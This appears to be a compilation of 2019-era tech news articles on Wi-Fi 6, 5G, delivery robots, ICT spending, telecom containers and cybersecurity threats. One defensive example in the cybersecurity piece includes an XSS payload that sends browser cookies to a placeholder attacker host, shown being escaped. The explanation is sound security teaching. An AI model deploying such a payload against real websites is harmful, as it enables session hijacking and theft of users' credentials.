The 802.11 standard for Wi-Fi networking is now 20 years old, and each new generation of the standard has provided greater speed than its predecessors. However, the forthcoming 802.11ax -- also known as Wi-Fi 6 -- represents perhaps the greatest change in the relatively short history of this now-ubiquitous technology.
We've covered some of the technical aspects of Wi-Fi 6 in recent months, but the defining feature of the new standard is that, as well as providing greater speed, Wi-Fi 6 is also intended to support a greater 'density' of network connections for the millions of permanently connected smart devices that now form the Internet of Things (IoT).
As we've reported, the final standard for Wi-Fi 6 isn't expected until late 2019, but a number of manufacturers have already announced plans for new routers based on the current 'Draft 3.0' version of that standard. Netgear certainly isn't the first manufacturer to announce support for Wi-Fi 6, but it is one of the few networking companies that could be described as a household name, and the release of its new Nighthawk AX range of routers represents something of a mass-market debut for the technology.
Pricing & options
There are four routers in the new range, with prices starting at £150 ex. VAT (£180 inc. VAT, or $200) for the Nighthawk AX4. That's the entry-level model in the range, but it supports dual-band, 4-stream 802.11ax Wi-Fi with speeds of up to 3Gbps -- which would be close to top-of-the-range for a conventional 802.11ac router.
The second model is the Nighthawk AX8, which is also a dual-band router, but steps up to 8 streams with speeds of up to 6Gbps, and is priced at £250 ex. VAT (£300 inc. VAT, or $299). The AX8 also adopts an eye-catching 'winged' design that hides the router's multiple antennae within large plastic fins that project upwards on each side of the unit.
The AX4 and AX8 routers are primarily aimed at home users who want high-speed wi-fi for tasks such as gaming or streaming video on multiple devices. However, it's the two high-end AX12 routers that are most likely to appeal to business users, as they provide even greater speed as well as advanced features that will be suitable for larger offices, public venues such as hotels and restaurants, or even large sports venues.
Delaying the rollout of 5G mobile network services could help operators to make a better return on their investment, according to industry experts.
Speaking exclusively to Total Telecom last week, Angus Ward, CEO of digital platform solutions at BearingPoint, said that telcos were being rushed by consumers into rolling out 5G services, despite the fact that 5G use cases in the consumer sector have not yet been proven to be profitable.
Ward believes that over 65 per cent of use cases for 5G will sit in the enterprise sector, as that is where customers are willing to pay a premium.
“5G is fundamentally different than what has gone before. There is a lot of fantastic innovation happening at the moment and some of the trials that are ongoing at the moment are showcasing some really fantastic stuff,” he said.
“However, with 3G and 4G – 4G specifically – there was this massive pent-up demand for much better on-device performance and quality from the consumer. There was no need to challenge the business model – consumers just needed things to run faster. That meant that operators were able to stick with the same use cases that had made them successful in the past.
“If you fast forward to 5G – the GSMA are saying that the build-out costs of a 5G network are four times as high as they were for 4G. It's a much higher investment cost.
“Now, people love their phones, but they don't need them to run 100 times faster than they do on 4G and they are certainly not prepared to pay four times as much for them.
“Our perspective is that 5G is different – there will be much higher costs and that 2/3rds of the use cases will sit in the enterprise market – because that is where people are willing to pay a premium. Yes, there is demand on the consumer side, but a lot of the consumer technology is not there yet – things like AR, VR, the high functioning wearables – they’re not quite there yet.
Telcos now face a challenge to make a sufficient return on their investment for their 5G rollout programmes, as Ward explains.
“The dilemma is that most of the telcos need the consumer side of the business to justify the investment in 5G but the profitable use cases are actually on the enterprise side of things.
“When it comes to the enterprise market, there are a number of challenges. They are new use cases and the question is how do you create those use cases? Typically, you need to have a deep understanding of the industry verticals that you are dealing with and then you need to have the innovation and R&D capacity to imbed connectivity into those solutions.
“From what we see, there is just not enough happening. If you take Smart Cities, there are virtually no cities in the world that are making Smart City initiatives profitable at the moment. The challenge is going to be: How do telcos monetize that space and make a sufficient return on their investment?”
FedEx unveils SameDay Bot, an autonomous delivery robot
FedEx's bot will be used for short-range deliveries
FedEx today announced its SameDay Bot, an autonomous delivery robot that will be used for short-distance deliveries. The company is testing the technology at its Memphis headquarters, and is in talks with popular retailers like Walmart and Target to bring the bot to their stores. The SameDay Bot is battery powered with a top speed of 10 mph, can climb stairs, and uses the same LIDAR tech found in autonomous vehicles to navigate.
FedEx is the latest delivery service to experiment with robots for short-distance deliveries, following in Amazon's robot tracks after its release of the Scout. Today, the company announced its new FedEx SameDay Bot, which it says will make "last mile" deliveries more efficient.
The bot is powered by batteries and has a top speed of 10 mph. It's autonomous, using cameras and LIDAR sensors to steer itself around people and traffic, similar to the technology found in self-driving cars.
FedEx will initially use the bot internally, shuttling packages between buildings at its Memphis headquarters. If the internal trials are successful, FedEx has ambitions to expand the service to other retailers, enabling them to offer same-day delivery services.
SameDay Bot was built with the help of Dean Kamen, the engineer who created the Segway and the stair-climbing wheelchair. Kamen's influence can be seen in FedEx's robot, which utilizes multiple sets of wheels to climb up steps and curbs.
The bot also has a screen on the front that can communicate with pedestrians, displaying messages like "hello" while a screen on the back indicates the direction it's traveling and if it's about to stop.
FedEx says it is currently negotiating with retailers like AutoZone, Pizza Hut, Target, and Walmart to gauge their need for a delivery system like this. Per its own research, more than 60 percent of customers live within three miles of one of those stores, the perfect radius for this little delivery bot. Soon, your pizza and your spark plugs could both be showing up atop a friendly, wheeled AI.
Samsung, WarnerMedia, Microsoft Join AT&T 5G Program
AT&T has launched a 5G innovation program to jumpstart work with developers, content creators and device makers to push 5G forward.
Participating companies include Microsoft, Magic Leap, Intel, Cisco, Ericsson, Infosys, Nokia, Samsung and WarnerMedia, according to AT&T.
Applications and use cases are expected to span consumer, enterprise and public sectors focusing on education, entertainment, gaming, history, retail and sports.
“What's vital here is to create the right conditions for 5G innovation to flourish,” said Andre Fuetsch, president of AT&T Labs and chief technology officer of AT&T Communications. “We believe 5G is the 'yes, you can' network, regardless of whether you're a global enterprise, small business or consumer.”
As one example of the announced collaboration with other companies, AT&T plans to launch a 5G innovation zone on the Magic Leap campus in Florida so developers and creators can test devices and applications on a 5G network.
Five emerging cybersecurity threats you should take very seriously in 2019
Ransomware isn’t the only cyberthreat your business will face this year. Here are five emerging threats that leaders need to know about.
The cyberthreat landscape continues to evolve, with new threats emerging almost daily. The ability to track and prepare to face these threats can help security and risk management leaders improve their organization's resilience and better support business goals.
The number of high-profile breaches and attacks making headlines has led business leaders to finally take cybersecurity seriously, said Sam Olyaei, senior principal and analyst at Gartner. "Today, not only are business leaders and the business community understanding cybersecurity, they know it's important to their business outcomes and objectives," Olyaei said. "The problem is, there is still a lack of understanding as to why it's important."
Firms must work to bridge the gap between communicating the technical aspects of cybersecurity and the business outcomes, such as customer satisfaction, financial health, and reputation, Olyaei said.
Keeping track of new threats, and not just established ones like ransomware, is key for a strong security posture, said Josh Zelonis, senior analyst at Forrester.
"Whenever we develop our strategies for how we're going to protect our organizations, it's really easy to look at things that you're familiar with, or that you have a good understanding of," Zelonis said. "But if you're not looking ahead, you're building for the problems that already exist, and not setting yourself up for long-term success. And that is really the number one reason why you need to be looking ahead -- to understand how attack techniques are evolving."
1. Cryptojacking
Ransomware has been one of the biggest threats impacting businesses in the past two years, exploiting basic vulnerabilities including lack of network segmentation and backups, Gartner's Olyaei said.
Today, threat actors are repurposing the same variants of ransomware previously used to encrypt data, instead hijacking an organization's resources or systems to mine for cryptocurrency -- a practice known as cryptojacking or cryptomining.
"These are strains of malware that are very similar to strains that different types of ransomware, like Petya and NotPetya, had in place, but instead it's kind of running in the background silently mining for cryptocurrency," Olyaei said. The rise of cryptojacking means the argument that many SMB leaders used in the past -- that their business was too small to be attacked -- goes out the window, Olyaei said. "You still have computers, you still have resources, you still have applications," he added. "And these application systems, computers, and resources can be used to mine for cryptocurrency. That's one of the biggest threats that we see from that standpoint."
2. Internet of Things (IoT) device threats
Companies are adding more and more devices to their infrastructures, said Forrester's Zelonis. "Organizations are going and adding solutions like security cameras and smart container ships, and a lot of these devices don't have how you're going to manage them factored into the design of the products."
Maintenance is often the last consideration when it comes to IoT, Zelonis said. Organizations that want to stay safe should require that all IoT devices be manageable and implement a process for updating them.
3. Geopolitical risks
More organizations are starting to consider where their products are based or implemented and where their data is stored, in terms of cybersecurity risks and regulations, Olyaei said. "When you have regulations like GDPR and threat actors that emerge from nation states like Russia, China, North Korea, and Iran, more and more organizations are beginning to evaluate the intricacies of the security controls of their vendors and their suppliers," Olyaei said. "They're looking at geopolitical risk as a cyber risk, whereas in the past geopolitical was sort of a separate risk function, belonging in enterprise risk."
If organizations do not consider location and geopolitical risk, those that store data in a third party or a nation state that is very sensitive will run the risk of threat actors or nation state resources being used against them, Olyaei said. "If you do that then you also impact the business outcome."
4. Cross-site scripting
Organizations struggle to avoid cross-site scripting (XSS) attacks in the development cycle, Zelonis said. More than 21 percent of vulnerabilities identified by bug bounty programs are XSS flaws, making XSS the leading vulnerability type, Forrester research found.
XSS attacks allow adversaries to use business websites to execute untrusted code in a victim's browser, making it easy for a criminal to interact with a user and steal the cookie information used for authentication, hijacking the user's session without any credentials, Forrester said. Security teams often discount the severity of this attack, Zelonis said. But bug bounty programs can help identify XSS flaws and other weaknesses in your systems, he added.
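As a minimal illustration of the vulnerability class (the payload and rendering function here are hypothetical sketches, not taken from Forrester's research), a reflected XSS flaw amounts to splicing untrusted input into a page verbatim; escaping output before it reaches the browser is the standard fix:

```python
import html

def render_comment(comment: str) -> str:
    """Render a user-supplied comment into an HTML fragment.

    html.escape() converts <, >, & and quotes into entities, so any
    markup in the comment is displayed as inert text rather than
    executed by the victim's browser.
    """
    return '<div class="comment">' + html.escape(comment) + '</div>'

# A classic cookie-stealing payload of the kind bug bounty hunters report.
# A vulnerable site would splice this in verbatim and the script would run;
# the escaped version renders harmlessly as text.
payload = '<script>new Image().src = "//evil.example/?c=" + document.cookie;</script>'
print(render_comment(payload))
```

Real applications would typically rely on a templating engine that escapes by default, plus a Content Security Policy, rather than hand-rolled escaping.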
5. Mobile malware
Mobile devices are increasingly a top attack target -- a trend rooted in poor vulnerability management, according to Forrester. But the analyst firm said many organizations that try to deploy mobile device management (MDM) solutions find that privacy concerns limit adoption.
The biggest pain point in this space is the Android installed base, Zelonis said. "The Google developer site shows that the vast majority of Android devices in the world are running pretty old versions of Android," he said. "And when you look at the motivations of a lot of IoT device manufacturers, it's challenging to get them to continue to support devices and get timely patches, because then you're getting back to mobile issues."
Organizations should ensure that employees have access to an anti-malware solution, Forrester recommended. Even if it isn't managed by the organization, this will alleviate some security concerns.
Report: Cloud and digital service providers fuel ICT spending
Despite blowback from a trade war with China and a slowing global economy, business spending on information and communications technologies (ICT) will continue to flourish, according to a report.
The forecast by International Data Corporation (IDC) predicts that worldwide spending on ICT will reach $4.6 trillion by 2022 with an average growth rate of 4% per year. That spending estimate takes place across hardware, software, services and telecommunications verticals, according to IDC.
Commercial customers will account for around 63.5% of the total spending by 2022 ($2.9 trillion), while consumers make up 36.5% ($1.7 trillion), according to IDC.
The fastest-growing segment over the forecast period will be the professional services vertical (7%), including cloud and digital services providers, which will account for a bigger piece of overall tech spending. IDC said the increase in tech spending was largely due to the explosive growth of the cloud infrastructure providers, which include Google Cloud, Microsoft Azure, IBM, and Amazon Web Services.
Other fast-growing segments include media (6%), banking (5%), retail (5%), and manufacturing (5%), while the slowest growth in commercial technology budgets will come from the federal government, followed by wholesale and construction firms.
The slowing economy and the trade war between China and the U.S. are putting pressure on companies to increase their technology budgets while also implementing their digital transformations through the use of artificial intelligence and data analytics.
"In the short term, the trade war between the U.S. and China continues to add volatility to the outlook," said Stephen Minton, vice president in IDC's customer insights and analysis group, in a prepared statement. "Some firms are also facing the double whammy of weaker sales in China, an increasingly important export market for the manufacturing industry.
"Meanwhile, the impact in China itself could persist over a longer period of time, with manufacturing and financial services firms being the most exposed."
Despite market maturity, business investments in digital transformation, cloud, and AI will help drive overall U.S. growth of 4.5% over the forecast period, equaling Latin America as the second-fastest-growing region for total ICT spending, behind China.
"In the U.S., the professional services industry is expected to continue with strong technology growth and investments. The appetite for cloud-based delivery, new apps, and tech-fueled services show no signs of slowing, and thus we are optimistic about the growth opportunity for this industry," said Jessica Goepfert, vice president in IDC's customer insights and analysis group, in the statement. "Consumer-driven industries such as retail and hospitality are benefitting from higher wages and disposable incomes.
"In response, firms in this space are working to develop and deliver unforgettable customer interactions. This takes shape as customizable experiences and infusing technology into their operations. For instance, hotels are implementing technology in guest rooms that can be controlled by mobile apps."
Devices supporting Wi-Fi 6, a.k.a. 802.11ax, are expected out in 2019, but with the standard yet to be ratified, jumping in early might best be left to those with a compelling use case -- and those do exist.
In five years, all you’re going to find is Wi-Fi 6, or what most wireless experts are still calling 802.11ax. But five years is a long time. If you’re considering an early move toward the most cutting-edge Wi-Fi technology on the market, there are some hurdles that you’ll have to overcome.
The first is the preliminary state of the technology. Every access point (AP) on the market that's being sold as 11ax or Wi-Fi 6 is pre-standard gear, given that the standard hasn't yet been finalized. That poses potential interoperability issues down the line, according to analysts. And of course, there are no Wi-Fi 6-ready smartphones, laptops or other client devices available yet.
Why upgrade to 802.11ax?
It’s important to understand why you’re updating, as well, noted Gartner senior principal analyst Bill Menezes. The main reason to upgrade now is futureproofing, given the lack of Wi-Fi 6-capable client devices on the market.
“You’re really just putting it in there because you got a great price on it, or you’ve decided, ‘Well, I may not have the money in five years to upgrade,’” he said.
It’s worth noting, however, that there are particular use cases that could benefit from Wi-Fi 6-ready hardware more than others. The one that comes up more than any other – unsurprisingly, given the technology’s focus on efficiently connecting to large numbers of client devices via a single AP – is the hospitality and entertainment sector. Sports stadiums, convention halls and other large event venues are likely to benefit from Wi-Fi 6’s ability to handle lots of connections per endpoint.
Beyond that, however, there’s little consensus among experts about early adoption of 802.11ax among particular verticals. Some analysts posit a use case for IoT – particularly industrial IoT – using that high connections-per-AP ability to connect sensors together, but others note that Wi-Fi is unlikely to be the preferred connectivity medium for the actual sensors. That’s not to say that edge gateway devices won’t use Wi-Fi to connect back to clouds or data centers, but the gateways themselves are more likely to use slightly more specialized technology – usually some form of low-power WAN – to communicate with the sensors directly.
Compatibility could be an issue for early adopters
Another potential hurdle is the difference between pre-standard hardware and standard-ready hardware. Certain gear being sold as Wi-Fi 6 now might not be guaranteed to fully comply with the final 802.11ax standard, which the Wi-Fi Alliance is expected to finalize near the end of 2019.
Forrester principal analyst Andre Kindness – who argued that it's probably too early for most businesses to consider a Wi-Fi 6 upgrade absent exceptional circumstances – said that this compatibility issue is an avoidable headache. If you invest in pre-standard hardware, you should first talk to your reseller or vendor to make sure it's not going to be a problem down the road. Multiple analysts urged potential buyers not to take "don't worry about it" for an answer.
Kindness said that not all pre-standard gear is going to be backward-compatible. “[Vendors] want to be the first to market, in general," he said. "If you're spending your R&D money, what are you going to spend it on: creating new products or enhancing the older ones?”
Benefits of 802.11ax
For all that, however, there’s still an outside case to be made for hopping on the Wi-Fi 6 bandwagon now instead of later, particularly for the aforementioned high-density deployment use cases.
Farpoint Group principal and Network World contributor Craig Mathias highlighted that the technical upsides of 802.11ax will eventually make the standard pretty well ubiquitous. It isn't really about higher throughput, according to Mathias. Sure, the theoretical maximum speeds are higher than those of the current top standard, 802.11ac Wave 2, but that technology is already more than fast enough for the majority of uses to which it is generally put.
Instead, the idea is to provide better responsiveness and lower latency, particularly when a given access point has to handle a higher volume of devices – a crucial consideration in an age when any given person might need to connect half a dozen client devices to the Internet.
“What we try to do is, obviously, make sure that everybody’s got the capacity they need, and 802.11ax is the best vehicle so far for doing that,” he said. “Again, it’s not really available, not really standardized, no real clients, but it is clearly the future, no matter what.”
Nor does the new technology present unusual concerns from a deployment perspective; standard best practices for Wi-Fi implementation should work well for most companies. A site survey, an alpha deployment, a beta test and a limited live deployment should identify any potential sticking points.
What’s more, the day-to-day management of 802.11ax could wind up being simpler than current-gen Wi-Fi, according to Mathias, though that’s more a function of what individual vendors do with the technology, rather than with the standard itself.
“The trend now is more robust management consoles, but particularly analytics, artificial intelligence and machine learning, so you’ll see those applied to a much greater degree,” he said.
Part of the reason for that is that the new low-level technologies in the standard, including bi-directional MU-MIMO and BSS coloring, are incredibly complicated. They're so complicated, in fact, that they're going to be problematic for network operators to configure on the fly, so AI/ML management techniques are going to become increasingly necessary, according to Mathias.
Report: Two-thirds of DDoS attacks take aim at communications service providers
In what should be a cautionary tale for enterprises, communications service providers were targeted by 65% of the distributed denial-of-service attacks in the third quarter of last year, according to a new report.
While it's not unexpected that DDoS attacks are taking aim at communications service providers (CSPs), it's how those attacks are carried out that is of concern. According to Nexusguard's "Q3 2018 Threat Report," the new method of attack exploits the large attack surface of ASN-level (autonomous system number) CSPs by spreading tiny volumes of attack traffic across hundreds of IP addresses to avoid detection.
Nexusguard said the continued discovery of new attack patterns should serve as a warning for enterprises to pick service providers with the best DDoS-proof systems.
"Perpetrators are using smaller, bit-and-piece methods to inject junk into legitimate traffic, causing attacks to bypass detection rather than sounding alarms with large, obvious attack spikes,” said Juniman Kasman, chief technology officer for Nexusguard, in a prepared statement. “Diffused traffic can cause communications service providers to easily miss large-scale DDoS attacks in the making, which is why these organizations will need to share the load with the cloud at the network edge to minimize attack impact.”
As a result of the new types of attacks, the attack sizes were 82% smaller in Q3 2018 compared to the same quarter a year ago.
Nexusguard analysts concluded that the attackers conducted reconnaissance missions to map out the network landscape and identify the mission-critical IP ranges of the targeted CSPs.
After the mapping, the attackers injected small pieces of junk into legitimate traffic, in volumes that easily slipped under detection thresholds. Due to the scale involved, broadly distributed, small-sized attack traffic is much harder to mitigate at the CSP level than traditional attacks concentrated on a small number of targeted IP addresses.
The “bit-and-piece” attacks observed in the quarter often used open domain name system (DNS) resolvers to launch what is commonly known as DNS amplification, with each targeted IP address receiving only a small number of responses in each campaign. This approach makes it difficult for CSPs to trace the attack traffic back to its origins.
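The evasion technique Nexusguard describes -- many small flows that individually stay under per-IP alarm thresholds while adding up to a large prefix-level attack -- can be sketched in a toy Python model. The traffic volumes and threshold below are invented for illustration, not taken from the report:

```python
# Hypothetical per-IP alarm threshold used by a simple DDoS detector.
THRESHOLD_MBPS = 100.0

def per_ip_alerts(traffic: dict[str, float]) -> list[str]:
    """Flag individual IP addresses whose traffic exceeds the threshold."""
    return [ip for ip, mbps in traffic.items() if mbps > THRESHOLD_MBPS]

def prefix_total(traffic: dict[str, float]) -> float:
    """Aggregate traffic across the whole IP prefix."""
    return sum(traffic.values())

# 200 addresses in one prefix, each receiving a small slice of junk traffic.
spread_attack = {f"203.0.113.{i}": 5.0 for i in range(200)}

print(per_ip_alerts(spread_attack))   # [] -- no single IP trips the alarm
print(prefix_total(spread_attack))    # 1000.0 Mbps hitting the prefix overall
```

Monitoring at the prefix or ASN level, as the report suggests CSPs must, is what reveals the large aggregate total that per-IP thresholds miss.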
Nexusguard said that "black-holing" all traffic to an entire IP prefix would be costly for the CSPs, because black-holing would also block access to a large number of legitimate services.
The report also found that China advanced its lead in global attack origins by contributing more than 23% of the worldwide campaigns, while 15% of the attacks originated in the U.S.
The report also found that Simple Service Discovery Protocol amplification attacks increased 639.8% in Q3 of last year compared to Q2 2018 because of the new patterns targeted at CSPs.
According to a report last month by ABI Research, the security analytics market will reach revenues of $12 billion by 2024.
Government Shutdown Puts U.S. at Major Hacking Risk, Cybersecurity Experts Warn
While President Donald Trump cites a “security crisis at our southern border” as a reason for the longest government shutdown in American history, cybersecurity experts are warning citizens that the federal freeze has put the U.S. at a significant risk for both short and long-term cyberattacks.
“We have laid out the welcome mat to any and all nefarious actors,” Mike O’Malley, VP of strategy at cloud defense firm Radware, told CBS News Wednesday. “Unfortunately, we know all too well from experience that hackers, especially nation-state sponsored, have a high level of patience and are willing to lie in wait for the most opportune moment to strike.”
Corporate data breaches impacted more than 1 billion Americans in 2018. While hackers stole personal information from Marriott International customers or gained access to Facebook users’ unshared photos in corporate breaches, hacking into government agencies’ security systems could have more nefarious repercussions.
According to O’Malley, a hack could have the most serious impact on the Department of Homeland Security, the State Department, or any other intelligence agency that holds sensitive information that could be compromised in a case of espionage or fraud.
Intelligence agencies are further weakened given the fact that approximately 85% of staff at the National Institute of Standards and Technology and 45% of the Department of Homeland Security’s newly established Cybersecurity and Infrastructure Security Agency have been furloughed, according to a report from security platform Duo Security.
Experts have expressed this growing concern throughout the shutdown. Last week, a former homeland security adviser to Barack Obama told Axios, “Cyber threats don’t operate on Washington’s political timetable, and they don’t stop because of a shutdown.”
Cybersecurity, however, isn’t the only safety concern that has been heightened during the shutdown.
Climate scientists at the National Hurricane Center warned that the shutdown could hinder short and long-term planning for natural disaster relief, conservation groups brought up increased fire risks in California, and the American Geophysical Union told Think Progress that it “would interrupt potentially life-saving information and observations from the scientists” working at various agencies.
Furthermore, more than 51,000 TSA employees have been working at airports without pay since December 22, which has resulted in a 55% increase of workers calling in sick, and the closure of security lanes.
World Wide Technology takes on industry challenges for service providers and enterprises
As a systems integrator, World Wide Technology (WWT) has its finger in just about all of the telecommunications pies due to ongoing work in its lab.
WWT was founded in 1990 as a small product reseller company, but it has grown into a technology solutions provider with $10.4 billion in annual revenue and more than 5,000 employees.
While WWT is somewhat closed-mouthed about some of the service providers that it works with in its Advanced Technology Center (ATC) labs, which are used for product demonstrations, proofs of concept, building reference architectures and other tasks, it counts Cisco, VMware, NetApp, Dell EMC, F5 Networks, and HPE among its vendor customers.
"There are probably about 200, 300 different OEMs that we do regular business with, so most of Silicon Valley," said WWT's Neil Anderson, practice manager of mobility, access and IoT solutions, in an interview with FierceTelecom. "We are a systems integrator that focuses on a lot of different spaces in IT; everything from networking to security collaboration, software development, cloud and data center.
"We help very large organizations with everything from upfront consulting about what they may need, and what are the different transitions that need to happen for the business outcomes that their C-levels are looking for, all the way to mass deployment at scale for them."
WWT's market segments include large global service providers, large enterprise customers and public sector customers, according to Anderson.
As service providers travel down their virtualization pathways, they have three basic choices for their transformations: do the work internally, work with a system integrator or adopt open source technologies. Service providers can mix and match those choices as they see fit, but Anderson said WWT works behind the scenes in its labs with even the do-it-yourself service providers.
"You'd be surprised to learn that even some of the major global service providers used us as the back end for a lot of what they are doing themselves," Anderson said. "You'd be surprised that we are a big logistics arm and integrator in the back end helping those guys to scale their businesses."
Containers are a work in progress for some telcos
1/16/19. Source: FierceTelecom
Last year, Kubernetes took center stage in the telecommunications industry as the primary means for managing containers, but there's still work to do.
The use of containers is already underway by telcos such as AT&T and BT, and there's no doubt more service providers will use them going forward.
Containers are lightweight, standalone, executable packages of software code that share an operating system, such as Linux, and can run large distributed applications. Because containers have the bare minimum software that's needed to run an application, they can be more efficient than virtual machines (VMs).
The hyperscale cloud service providers, such as Microsoft Azure, Google and Amazon Web Services, pioneered the initial adoption of container software in their data centers, but the majority of telcos are just starting to explore using them.
A survey last year by IHS Markit, which included cloud service providers and telco service providers, asked respondents what portion of their servers were single tenant, virtualized (with a hypervisor) or containerized, and how they expected that to change in 2019. Respondents expected containerized servers to nearly double, from an average of 12% in 2017 to 23% by 2019.
While Google-developed Kubernetes is now the de facto standard for orchestrating and managing containers across public and private clouds, Colt Technology's Mirko Voltolini, head of Network On Demand, said his company isn't ready to jump into containers with both feet.
Voltolini said there currently wasn't a sense of maturity in the tool sets needed to control and orchestrate the life cycle of a container, as opposed to a virtual network function with a VM wrapped around it.
"So containers obviously are ready, but you need to be able to orchestrate containers," he said in an interview with FierceTelecom. "You need to be able to manage the full life cycle of an application in a containerized approach. We don't even have a maturity of orchestration level for the current virtual VM-based virtualized world. There are no off-the-shelf orchestrators that can manage containers for these use-cases.
"Containers are a really nice concept and we're going to move into that at some point. But using containers means we are taking an application, breaking it down into microservices, putting them in containers and then composing services based on that with our orchestrators. I cannot buy anything that does that orchestration today. Could I do something myself? Maybe, but I don't want to do that."
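The life-cycle management Voltolini describes is what a container orchestrator declares in configuration. As a rough illustration (the names and image below are placeholders, not Colt's or anyone's actual VNFs), a Kubernetes Deployment states the desired number of running copies of a containerized service, and the orchestrator continuously restarts or reschedules containers to match it:

```yaml
# Hypothetical Kubernetes Deployment for a containerized network function.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: vnf-demo                      # placeholder name
spec:
  replicas: 3                         # orchestrator keeps three copies alive
  selector:
    matchLabels:
      app: vnf-demo
  template:
    metadata:
      labels:
        app: vnf-demo
    spec:
      containers:
        - name: vnf-demo
          image: example/vnf-demo:1.0 # placeholder image reference
```

This covers scheduling and restarts for a single microservice; Voltolini's point is that composing whole services out of many such pieces, end to end, still lacks an off-the-shelf orchestration layer for telco use cases.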
It's worth noting that since Colt's services are directed toward business customers rather than residential end users, its VNFs are different from those used by AT&T or Verizon.
Hyperlocal radio and do-it-yourself networks bring information closer to home
Modern communications technology means one can find anything, anywhere around the world, on the internet and via mobile phones. But people still live in communities and need information that is relevant to them.
By taking a fresh look at community radio – with an FM signal broadcast over a catchment area of only a few kilometres – researchers are finding new and surprising ways to connect remote or rural communities, even in areas where communications may be patchy.
"We think that FM is still a very useful and very important medium, and it deserves a fresh look as to how it works … and how will it interact with … these more recent technologies," said Professor Christopher Csíkszentmihályi, who is leading a project called Grassroot Wavelengths to create a network of community-owned and -operated radio stations.
"While it may be relatively old technology now, it is still very relevant in many parts of the world," he said.
Rather than replacing FM radio, new mobile and web technology can extend the medium and offer fusions unexplored by more traditional radio platforms.
"What differentiates these stations from a lot of community radio stations is that they are very highly networked, so they are all going off a strong connection to the internet and mobile telephony," said Prof. Csíkszentmihályi, who is based at the Madeira Interactive Technologies Institute (M-ITI) in Portugal.
The Grassroot Wavelengths project makes FM frequencies available for hyperlocal community radio stations, which can work off a transmitter connected to a mobile phone, broadcasting over a radius of up to 12 km, perhaps covering a neighbourhood, or a village and its surroundings.
Instead of a studio and a large transmitter, the system can be controlled through speech recognition and a web interface: a manager can line up a series of programmes, or switch between podcasts, streamed material and live calls to a chat programme, much like hosting a conference call. People can listen on an FM receiver or via streaming, and can call the station or interact with it over the web.